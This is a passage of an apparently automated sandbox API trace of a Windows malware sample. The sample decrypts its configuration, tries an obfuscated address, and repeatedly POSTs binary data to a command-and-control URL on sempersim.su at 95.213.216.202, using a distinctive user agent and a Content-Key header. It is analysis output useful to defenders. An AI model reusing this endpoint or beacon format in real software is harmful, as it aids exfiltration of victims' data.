(lpFirst="\x97\x8b\x8b\x8fÅÐÐ\x8c\x9a\x92\x8f\x9a\x8d\x8c\x96\x92Ñ\x8c\x8aÐ\x98\x92ÎÌÐ\x99\x8d\x9aÑ\x8f\x97\x8f", lpSrch=":") returned 0x0 [0100.711] GetProcessHeap () returned 0x620000 [0100.711] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x20) returned 0x633228 [0100.711] getaddrinfo (in: pNodeName="\x97\x8b\x8b\x8fÅÐÐ\x8c\x9a\x92\x8f\x9a\x8d\x8c\x96\x92Ñ\x8c\x8aÐ\x98\x92ÎÌÐ\x99\x8d\x9aÑ\x8f\x97\x8f", pServiceName="80", pHints=0x19fcb8*(ai_flags=0, ai_family=2, ai_socktype=1, ai_protocol=6, ai_addrlen=0x0, ai_canonname=0x0, ai_addr=0x0, ai_next=0x0), ppResult=0x19fcd8 | out: ppResult=0x19fcd8*=0x0) returned 11001 [0100.711] GetProcessHeap () returned 0x620000 [0100.712] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x633228 | out: hHeap=0x620000) returned 1 [0100.712] GetProcessHeap () returned 0x620000 [0100.712] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x635b58 | out: hHeap=0x620000) returned 1 [0100.713] GetProcessHeap () returned 0x620000 [0100.713] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x643200 | out: hHeap=0x620000) returned 1 [0100.713] GetProcessHeap () returned 0x620000 [0100.713] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x40) returned 0x642e58 [0100.716] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x77420000 [0100.716] CryptAcquireContextW (in: phProv=0x19fca8, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0x10 | out: phProv=0x19fca8*=0x0) returned 1 [0100.721] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x77420000 [0100.721] CryptAcquireContextW (in: phProv=0x19fca8, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0x8 | out: phProv=0x19fca8*=0x63bd38) returned 1 [0100.727] GetProcessHeap () returned 0x620000 [0100.727] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x24) returned 0x638f78 [0100.728] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x77420000 [0100.728] CryptImportKey (in: hProv=0x63bd38, pbData=0x638f78*, dwDataLen=0x24, hPubKey=0x0, dwFlags=0x0, phKey=0x19fcac | out: phKey=0x19fcac*=0x62d710) returned 1 [0100.731] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x77420000 [0100.732] CryptSetKeyParam (hKey=0x62d710, dwParam=0x4, pbData=0x19fca4*=0x1, dwFlags=0x0) returned 1 [0100.732] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x77420000 [0100.733] CryptSetKeyParam (hKey=0x62d710, dwParam=0x1, pbData=0x418960, dwFlags=0x0) returned 1 [0100.733] GetProcessHeap () returned 0x620000 [0100.733] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x638f78 | out: hHeap=0x620000) returned 1 [0100.734] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x77420000 [0100.735] CryptDecrypt (in: hKey=0x62d710, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x642e58, pdwDataLen=0x19fcfc | out: pbData=0x642e58, pdwDataLen=0x19fcfc) returned 1 [0100.736] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x77420000 [0100.736] CryptDestroyKey (hKey=0x62d710) returned 1 [0100.737] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x77420000 [0100.738] CryptReleaseContext (hProv=0x63bd38, dwFlags=0x0) returned 1 [0100.738] GetProcessHeap () returned 0x620000 [0100.738] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x212) returned 0x635b58 [0100.739] LoadLibraryW (lpLibFileName="shlwapi") returned 0x74df0000 [0100.739] StrStrA (lpFirst="http://sempersim.su/gm13/fre.php", lpSrch="http://") returned="http://sempersim.su/gm13/fre.php" [0100.740] LoadLibraryW (lpLibFileName="shlwapi") returned 0x74df0000 [0100.740] StrStrA (lpFirst="sempersim.su/gm13/fre.php", lpSrch="/") returned="/gm13/fre.php" [0100.741] LoadLibraryW (lpLibFileName="shlwapi") returned 0x74df0000 [0100.742] StrStrA (lpFirst="sempersim.su/gm13/fre.php", lpSrch=":") returned 0x0 [0100.742] GetProcessHeap () returned 0x620000 [0100.742] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x20) returned 0x633228 [0100.742] getaddrinfo (in: pNodeName="sempersim.su", pServiceName="80", pHints=0x19fcb8*(ai_flags=0, ai_family=2, ai_socktype=1, ai_protocol=6, ai_addrlen=0x0, ai_canonname=0x0, ai_addr=0x0, ai_next=0x0), ppResult=0x19fcd8 | out: ppResult=0x19fcd8*=0x63c4b0*(ai_flags=0, ai_family=2, ai_socktype=1, ai_protocol=6, ai_addrlen=0x10, ai_canonname=0x0, ai_addr=0x63eb50*(sa_family=2, sin_port=0x50, sin_addr="95.213.216.202"), ai_next=0x0)) returned 0 [0100.747] GetProcessHeap () returned 0x620000 [0100.747] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x4) returned 0x63b570 [0100.747] socket (af=2, type=1, protocol=6) returned 0x288 [0100.747] connect (s=0x288, name=0x63eb50*(sa_family=2, sin_port=0x50, sin_addr="95.213.216.202"), namelen=16) returned 0 [0100.801] FreeAddrInfoW (pAddrInfo=0x63c4b0*(ai_flags=0, ai_family=2, ai_socktype=1, ai_protocol=6, ai_addrlen=0x10, ai_canonname=0x0, ai_addr=0x63eb50*(sa_family=2, sin_port=0x50, sin_addr="95.213.216.202"), ai_next=0x0)) [0100.801] GetProcessHeap () returned 0x620000 [0100.801] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x7d) returned 0x63ba08 [0100.801] GetProcessHeap () returned 0x620000 [0100.801] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x201b) returned 0x644560 [0100.801] LoadLibraryW (lpLibFileName="user32") returned 0x74f40000 [0100.802] wvsprintfA (in: param_1=0x644560, param_2="POST %s HTTP/1.0\r\nUser-Agent: %s\r\nHost: %s\r\nAccept: */*\r\nContent-Type: application/octet-stream\r\nContent-Encoding: binary\r\n", arglist=0x19fce0 | out: param_1="POST /gm13/fre.php HTTP/1.0\r\nUser-Agent: Mozilla/4.08 (Charon; Inferno)\r\nHost: sempersim.su\r\nAccept: */*\r\nContent-Type: application/octet-stream\r\nContent-Encoding: binary\r\n") returned 172 [0100.802] GetProcessHeap () returned 0x620000 [0100.802] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0xae) returned 0x636288 [0100.802] GetProcessHeap () returned 0x620000 [0100.803] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x644560 | out: hHeap=0x620000) returned 1 [0100.803] GetProcessHeap () returned 0x620000 [0100.803] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x3e) returned 0x642ea0 [0100.803] GetProcessHeap () returned 0x620000 [0100.803] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x1fdc) returned 0x644560 [0100.803] LoadLibraryW (lpLibFileName="user32") returned 0x74f40000 [0100.804] wvsprintfA (in: param_1=0x644560, param_2="%sContent-Key: %X\r\nContent-Length: %i\r\nConnection: close\r\n\r\n", arglist=0x19fce0 | out: param_1="POST /gm13/fre.php HTTP/1.0\r\nUser-Agent: Mozilla/4.08 (Charon; Inferno)\r\nHost: sempersim.su\r\nAccept: */*\r\nContent-Type: application/octet-stream\r\nContent-Encoding: binary\r\nContent-Key: 6585B194\r\nContent-Length: 159\r\nConnection: close\r\n\r\n") returned 237 [0100.804] GetProcessHeap () returned 0x620000 [0100.804] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0xef) returned 0x636340 [0100.804] GetProcessHeap () returned 0x620000 [0100.804] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x644560 | out: hHeap=0x620000) returned 1 [0100.805] send (s=0x288, buf=0x636340*, len=237, flags=0) returned 237 [0100.805] send (s=0x288, buf=0x6421e0*, len=159, flags=0) returned 159 [0100.805] GetProcessHeap () returned 0x620000 [0100.805] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0xfd0) returned 0x644560 [0100.805] recv (in: s=0x288, buf=0x644560, len=4048, flags=0 | out: buf=0x644560*) returned 237 [0102.208] GetProcessHeap () returned 0x620000 [0102.209] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x636340 | out: hHeap=0x620000) returned 1 [0102.209] GetProcessHeap () returned 0x620000 [0102.209] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x642ea0 | out: hHeap=0x620000) returned 1 [0102.209] GetProcessHeap () returned 0x620000 [0102.209] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x636288 | out: hHeap=0x620000) returned 1 [0102.210] GetProcessHeap () returned 0x620000 [0102.210] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x63ba08 | out: hHeap=0x620000) returned 1 [0102.210] closesocket (s=0x288) returned 0 [0102.211] GetProcessHeap () returned 0x620000 [0102.211] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x63b570 | out: hHeap=0x620000) returned 1 [0102.211] GetProcessHeap () returned 0x620000 [0102.211] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x635b58 | out: hHeap=0x620000) returned 1 [0102.211] GetProcessHeap () returned 0x620000 [0102.211] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x642e58 | out: hHeap=0x620000) returned 1 [0102.211] GetProcessHeap () returned 0x620000 [0102.211] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x633228 | out: hHeap=0x620000) returned 1 [0102.234] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0x41289a, lpParameter=0x644560, dwCreationFlags=0x0, lpThreadId=0x19ff08 | out: lpThreadId=0x19ff08*=0x1168) returned 0x288 [0102.243] Sleep (dwMilliseconds=0xea60) [0102.255] GetProcessHeap () returned 0x620000 [0102.255] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x40) returned 0x643200 [0102.256] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x77420000 [0102.256] CryptAcquireContextW (in: phProv=0x19fca8, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0x10 | out: phProv=0x19fca8*=0x0) returned 1 [0102.264] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x77420000 [0102.265] CryptAcquireContextW (in: phProv=0x19fca8, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0x8 | out: phProv=0x19fca8*=0x63bcb0) returned 1 [0102.285] GetProcessHeap () returned 0x620000 [0102.285] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x24) returned 0x638f78 [0102.286] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x77420000 [0102.286] CryptImportKey (in: hProv=0x63bcb0, pbData=0x638f78*, dwDataLen=0x24, hPubKey=0x0, dwFlags=0x0, phKey=0x19fcac | out: phKey=0x19fcac*=0x62d190) returned 1 [0102.287] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x77420000 [0102.287] CryptSetKeyParam (hKey=0x62d190, dwParam=0x4, pbData=0x19fca4*=0x1, dwFlags=0x0) returned 1 [0102.288] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x77420000 [0102.288] CryptSetKeyParam (hKey=0x62d190, dwParam=0x1, pbData=0x418960, dwFlags=0x0) returned 1 [0102.288] GetProcessHeap () returned 0x620000 [0102.289] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x638f78 | out: hHeap=0x620000) returned 1 [0102.289] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x77420000 [0102.289] CryptDecrypt (in: hKey=0x62d190, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x643200, pdwDataLen=0x19fcfc | out: pbData=0x643200, pdwDataLen=0x19fcfc) returned 1 [0102.295] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x77420000 [0102.297] CryptDestroyKey (hKey=0x62d190) returned 1 [0102.298] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x77420000 [0102.298] CryptReleaseContext (hProv=0x63bcb0, dwFlags=0x0) returned 1 [0102.298] GetProcessHeap () returned 0x620000 [0102.298] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x212) returned 0x635b58 [0102.299] LoadLibraryW (lpLibFileName="shlwapi") returned 0x74df0000 [0102.299] StrStrA (lpFirst="\x97\x8b\x8b\x8fÅÐÐ\x8c\x9a\x92\x8f\x9a\x8d\x8c\x96\x92Ñ\x8c\x8aÐ\x98\x92ÎÌÐ\x99\x8d\x9aÑ\x8f\x97\x8f", lpSrch="http://") returned 0x0 [0102.300] LoadLibraryW (lpLibFileName="shlwapi") returned 0x74df0000 [0102.300] StrStrA (lpFirst="\x97\x8b\x8b\x8fÅÐÐ\x8c\x9a\x92\x8f\x9a\x8d\x8c\x96\x92Ñ\x8c\x8aÐ\x98\x92ÎÌÐ\x99\x8d\x9aÑ\x8f\x97\x8f", lpSrch="https://") returned 0x0 [0102.301] LoadLibraryW (lpLibFileName="shlwapi") returned 0x74df0000 [0102.301] StrStrA (lpFirst="\x97\x8b\x8b\x8fÅÐÐ\x8c\x9a\x92\x8f\x9a\x8d\x8c\x96\x92Ñ\x8c\x8aÐ\x98\x92ÎÌÐ\x99\x8d\x9aÑ\x8f\x97\x8f", lpSrch="/") returned 0x0 [0102.302] LoadLibraryW (lpLibFileName="shlwapi") returned 0x74df0000 [0102.302] StrStrA (lpFirst="\x97\x8b\x8b\x8fÅÐÐ\x8c\x9a\x92\x8f\x9a\x8d\x8c\x96\x92Ñ\x8c\x8aÐ\x98\x92ÎÌÐ\x99\x8d\x9aÑ\x8f\x97\x8f", lpSrch=":") returned 0x0 [0102.302] GetProcessHeap () returned 0x620000 [0102.302] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x20) returned 0x633228 [0102.302] getaddrinfo (in: pNodeName="\x97\x8b\x8b\x8fÅÐÐ\x8c\x9a\x92\x8f\x9a\x8d\x8c\x96\x92Ñ\x8c\x8aÐ\x98\x92ÎÌÐ\x99\x8d\x9aÑ\x8f\x97\x8f", pServiceName="80", pHints=0x19fcb8*(ai_flags=0, ai_family=2, ai_socktype=1, ai_protocol=6, ai_addrlen=0x0, ai_canonname=0x0, ai_addr=0x0, ai_next=0x0), ppResult=0x19fcd8 | out: ppResult=0x19fcd8*=0x0) returned 11001 [0102.303] GetProcessHeap () returned 0x620000 [0102.303] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x633228 | out: hHeap=0x620000) returned 1 [0102.303] GetProcessHeap () returned 0x620000 [0102.304] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x635b58 | out: hHeap=0x620000) returned 1 [0102.304] GetProcessHeap () returned 0x620000 [0102.304] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x643200 | out: hHeap=0x620000) returned 1 [0102.304] GetProcessHeap () returned 0x620000 [0102.304] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x40) returned 0x643098 [0102.305] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x77420000 [0102.305] CryptAcquireContextW (in: phProv=0x19fca8, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0x10 | out: phProv=0x19fca8*=0x0) returned 1 [0102.313] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x77420000 [0102.314] CryptAcquireContextW (in: phProv=0x19fca8, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0x8 | out: phProv=0x19fca8*=0x63b980) returned 1 [0102.320] GetProcessHeap () returned 0x620000 [0102.320] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x24) returned 0x638f78 [0102.321] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x77420000 [0102.321] CryptImportKey (in: hProv=0x63b980, pbData=0x638f78*, dwDataLen=0x24, hPubKey=0x0, dwFlags=0x0, phKey=0x19fcac | out: phKey=0x19fcac*=0x62d710) returned 1 [0102.322] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x77420000 [0102.322] CryptSetKeyParam (hKey=0x62d710, dwParam=0x4, pbData=0x19fca4*=0x1, dwFlags=0x0) returned 1 [0102.323] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x77420000 [0102.323] CryptSetKeyParam (hKey=0x62d710, dwParam=0x1, pbData=0x418960, dwFlags=0x0) returned 1 [0102.323] GetProcessHeap () returned 0x620000 [0102.324] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x638f78 | out: hHeap=0x620000) returned 1 [0102.326] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x77420000 [0102.327] CryptDecrypt (in: hKey=0x62d710, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x643098, pdwDataLen=0x19fcfc | out: pbData=0x643098, pdwDataLen=0x19fcfc) returned 1 [0102.327] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x77420000 [0102.328] CryptDestroyKey (hKey=0x62d710) returned 1 [0102.328] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x77420000 [0102.329] CryptReleaseContext (hProv=0x63b980, dwFlags=0x0) returned 1 [0102.329] GetProcessHeap () returned 0x620000 [0102.329] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x212) returned 0x635b58 [0102.329] LoadLibraryW (lpLibFileName="shlwapi") returned 0x74df0000 [0102.330] StrStrA (lpFirst="http://sempersim.su/gm13/fre.php", lpSrch="http://") returned="http://sempersim.su/gm13/fre.php" [0102.330] LoadLibraryW (lpLibFileName="shlwapi") returned 0x74df0000 [0102.331] StrStrA (lpFirst="sempersim.su/gm13/fre.php", lpSrch="/") returned="/gm13/fre.php" [0102.331] LoadLibraryW (lpLibFileName="shlwapi") returned 0x74df0000 [0102.332] StrStrA (lpFirst="sempersim.su/gm13/fre.php", lpSrch=":") returned 0x0 [0102.332] GetProcessHeap () returned 0x620000 [0102.332] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x20) returned 0x633228 [0102.332] getaddrinfo (in: pNodeName="sempersim.su", pServiceName="80", pHints=0x19fcb8*(ai_flags=0, ai_family=2, ai_socktype=1, ai_protocol=6, ai_addrlen=0x0, ai_canonname=0x0, ai_addr=0x0, ai_next=0x0), ppResult=0x19fcd8 | out: ppResult=0x19fcd8*=0x63c190*(ai_flags=0, ai_family=2, ai_socktype=1, ai_protocol=6, ai_addrlen=0x10, ai_canonname=0x0, ai_addr=0x63ea60*(sa_family=2, sin_port=0x50, sin_addr="95.213.216.202"), ai_next=0x0)) returned 0 [0102.335] GetProcessHeap () returned 0x620000 [0102.335] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x4) returned 0x63b550 [0102.335] socket (af=2, type=1, protocol=6) returned 0x28c [0102.335] connect (s=0x28c, name=0x63ea60*(sa_family=2, sin_port=0x50, sin_addr="95.213.216.202"), namelen=16) returned 0 [0102.387] FreeAddrInfoW (pAddrInfo=0x63c190*(ai_flags=0, ai_family=2, ai_socktype=1, ai_protocol=6, ai_addrlen=0x10, ai_canonname=0x0, ai_addr=0x63ea60*(sa_family=2, sin_port=0x50, sin_addr="95.213.216.202"), ai_next=0x0)) [0102.387] GetProcessHeap () returned 0x620000 [0102.387] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x7d) returned 0x63b6d8 [0102.387] GetProcessHeap () returned 0x620000 [0102.387] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x201b) returned 0x644560 [0102.388] LoadLibraryW (lpLibFileName="user32") returned 0x74f40000 [0102.389] wvsprintfA (in: param_1=0x644560, param_2="POST %s HTTP/1.0\r\nUser-Agent: %s\r\nHost: %s\r\nAccept: */*\r\nContent-Type: application/octet-stream\r\nContent-Encoding: binary\r\n", arglist=0x19fce0 | out: param_1="POST /gm13/fre.php HTTP/1.0\r\nUser-Agent: Mozilla/4.08 (Charon; Inferno)\r\nHost: sempersim.su\r\nAccept: */*\r\nContent-Type: application/octet-stream\r\nContent-Encoding: binary\r\n") returned 172 [0102.389] GetProcessHeap () returned 0x620000 [0102.389] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0xae) returned 0x636288 [0102.389] GetProcessHeap () returned 0x620000 [0102.390] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x644560 | out: hHeap=0x620000) returned 1 [0102.390] GetProcessHeap () returned 0x620000 [0102.390] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x3e) returned 0x642f30 [0102.390] GetProcessHeap () returned 0x620000 [0102.390] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x1fdc) returned 0x644560 [0102.391] LoadLibraryW (lpLibFileName="user32") returned 0x74f40000 [0102.391] wvsprintfA (in: param_1=0x644560, param_2="%sContent-Key: %X\r\nContent-Length: %i\r\nConnection: close\r\n\r\n", arglist=0x19fce0 | out: param_1="POST /gm13/fre.php HTTP/1.0\r\nUser-Agent: Mozilla/4.08 (Charon; Inferno)\r\nHost: sempersim.su\r\nAccept: */*\r\nContent-Type: application/octet-stream\r\nContent-Encoding: binary\r\nContent-Key: 6585B194\r\nContent-Length: 159\r\nConnection: close\r\n\r\n") returned 237 [0102.391] GetProcessHeap () returned 0x620000 [0102.391] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0xef) returned 0x636340 [0102.391] GetProcessHeap () returned 0x620000 [0102.392] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x644560 | out: hHeap=0x620000) returned 1 [0102.392] send (s=0x28c, buf=0x636340*, len=237, flags=0) returned 237 [0102.394] send (s=0x28c, buf=0x6421e0*, len=159, flags=0) returned 159 [0102.394] GetProcessHeap () returned 0x620000 [0102.394] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0xfd0) returned 0x644560 [0102.394] recv (in: s=0x28c, buf=0x644560, len=4048, flags=0 | out: buf=0x644560*) returned 237 [0104.162] GetProcessHeap () returned 0x620000 [0104.162] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x636340 | out: hHeap=0x620000) returned 1 [0104.162] GetProcessHeap () returned 0x620000 [0104.163] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x642f30 | out: hHeap=0x620000) returned 1 [0104.163] GetProcessHeap () returned 0x620000 [0104.163] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x636288 | out: hHeap=0x620000) returned 1 [0104.163] GetProcessHeap () returned 0x620000 [0104.163] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x63b6d8 | out: hHeap=0x620000) returned 1 [0104.163] closesocket (s=0x28c) returned 0 [0104.165] GetProcessHeap () returned 0x620000 [0104.165] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x63b550 | out: hHeap=0x620000) returned 1 [0104.165] GetProcessHeap () returned 0x620000 [0104.165] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x635b58 | out: hHeap=0x620000) returned 1 [0104.165] GetProcessHeap () returned 0x620000 [0104.166] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x643098 | out: hHeap=0x620000) returned 1 [0104.166] GetProcessHeap () returned 0x620000 [0104.166] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x633228 | out: hHeap=0x620000) returned 1 [0104.167] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0x41289a, lpParameter=0x644560, dwCreationFlags=0x0, lpThreadId=0x19ff08 | out: lpThreadId=0x19ff08*=0x10f8) returned 0x28c [0104.169] Sleep (dwMilliseconds=0xea60) [0104.183] GetProcessHeap () returned 0x620000 [0104.183] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x40) returned 0x643518 [0104.183] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x77420000 [0104.184] CryptAcquireContextW (in: phProv=0x19fca8, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0x10 | out: phProv=0x19fca8*=0x0) returned 1 [0104.193] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x77420000 [0104.193] CryptAcquireContextW (in: phProv=0x19fca8, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0x8 | out: phProv=0x19fca8*=0x63bcb0) returned 1 [0104.238] GetProcessHeap () returned 0x620000 [0104.238] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x24) returned 0x6390f8 [0104.238] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x77420000 [0104.239] CryptImportKey (in: hProv=0x63bcb0, pbData=0x6390f8*, dwDataLen=0x24, hPubKey=0x0, dwFlags=0x0, phKey=0x19fcac | out: phKey=0x19fcac*=0x62d710) returned 1 [0104.240] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x77420000 [0104.240] CryptSetKeyParam (hKey=0x62d710, dwParam=0x4, pbData=0x19fca4*=0x1, dwFlags=0x0) returned 1 [0104.241] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x77420000 [0104.241] CryptSetKeyParam (hKey=0x62d710, dwParam=0x1, pbData=0x418960, dwFlags=0x0) returned 1 [0104.241] GetProcessHeap () returned 0x620000 [0104.241] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x6390f8 | out: hHeap=0x620000) returned 1 [0104.242] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x77420000 [0104.242] CryptDecrypt (in: hKey=0x62d710, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x643518, pdwDataLen=0x19fcfc | out: pbData=0x643518, pdwDataLen=0x19fcfc) returned 1 [0104.243] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x77420000 [0104.243] CryptDestroyKey (hKey=0x62d710) returned 1 [0104.244] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x77420000 [0104.244] CryptReleaseContext (hProv=0x63bcb0, dwFlags=0x0) returned 1 [0104.244] GetProcessHeap () returned 0x620000 [0104.244] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x212) returned 0x635b58 [0104.255] LoadLibraryW (lpLibFileName="shlwapi") returned 0x74df0000 [0104.255] StrStrA (lpFirst="\x97\x8b\x8b\x8fÅÐÐ\x8c\x9a\x92\x8f\x9a\x8d\x8c\x96\x92Ñ\x8c\x8aÐ\x98\x92ÎÌÐ\x99\x8d\x9aÑ\x8f\x97\x8f", lpSrch="http://") returned 0x0 [0104.256] LoadLibraryW (lpLibFileName="shlwapi") returned 0x74df0000 [0104.256] StrStrA (lpFirst="\x97\x8b\x8b\x8fÅÐÐ\x8c\x9a\x92\x8f\x9a\x8d\x8c\x96\x92Ñ\x8c\x8aÐ\x98\x92ÎÌÐ\x99\x8d\x9aÑ\x8f\x97\x8f", lpSrch="https://") returned 0x0 [0104.257] LoadLibraryW (lpLibFileName="shlwapi") returned 0x74df0000 [0104.257] StrStrA (lpFirst="\x97\x8b\x8b\x8fÅÐÐ\x8c\x9a\x92\x8f\x9a\x8d\x8c\x96\x92Ñ\x8c\x8aÐ\x98\x92ÎÌÐ\x99\x8d\x9aÑ\x8f\x97\x8f", lpSrch="/") returned 0x0 [0104.258] LoadLibraryW (lpLibFileName="shlwapi") returned 0x74df0000 [0104.258] StrStrA (lpFirst="\x97\x8b\x8b\x8fÅÐÐ\x8c\x9a\x92\x8f\x9a\x8d\x8c\x96\x92Ñ\x8c\x8aÐ\x98\x92ÎÌÐ\x99\x8d\x9aÑ\x8f\x97\x8f", lpSrch=":") returned 0x0 [0104.258] GetProcessHeap () returned 0x620000 [0104.258] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x20) returned 0x633228 [0104.258] getaddrinfo (in: pNodeName="\x97\x8b\x8b\x8fÅÐÐ\x8c\x9a\x92\x8f\x9a\x8d\x8c\x96\x92Ñ\x8c\x8aÐ\x98\x92ÎÌÐ\x99\x8d\x9aÑ\x8f\x97\x8f", pServiceName="80", pHints=0x19fcb8*(ai_flags=0, ai_family=2, ai_socktype=1, ai_protocol=6, ai_addrlen=0x0, ai_canonname=0x0, ai_addr=0x0, ai_next=0x0), ppResult=0x19fcd8 | out: ppResult=0x19fcd8*=0x0) returned 11001 [0104.259] GetProcessHeap () returned 0x620000 [0104.259] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x633228 | out: hHeap=0x620000) returned 1 [0104.259] GetProcessHeap () returned 0x620000 [0104.259] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x635b58 | out: hHeap=0x620000) returned 1 [0104.259] GetProcessHeap () returned 0x620000 [0104.260] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x643518 | out: hHeap=0x620000) returned 1 [0104.260] GetProcessHeap () returned 0x620000 [0104.260] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x40) returned 0x642f78 [0104.265] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x77420000 [0104.265] CryptAcquireContextW (in: phProv=0x19fca8, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0x10 | out: phProv=0x19fca8*=0x0) returned 1 [0104.270] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x77420000 [0104.271] CryptAcquireContextW 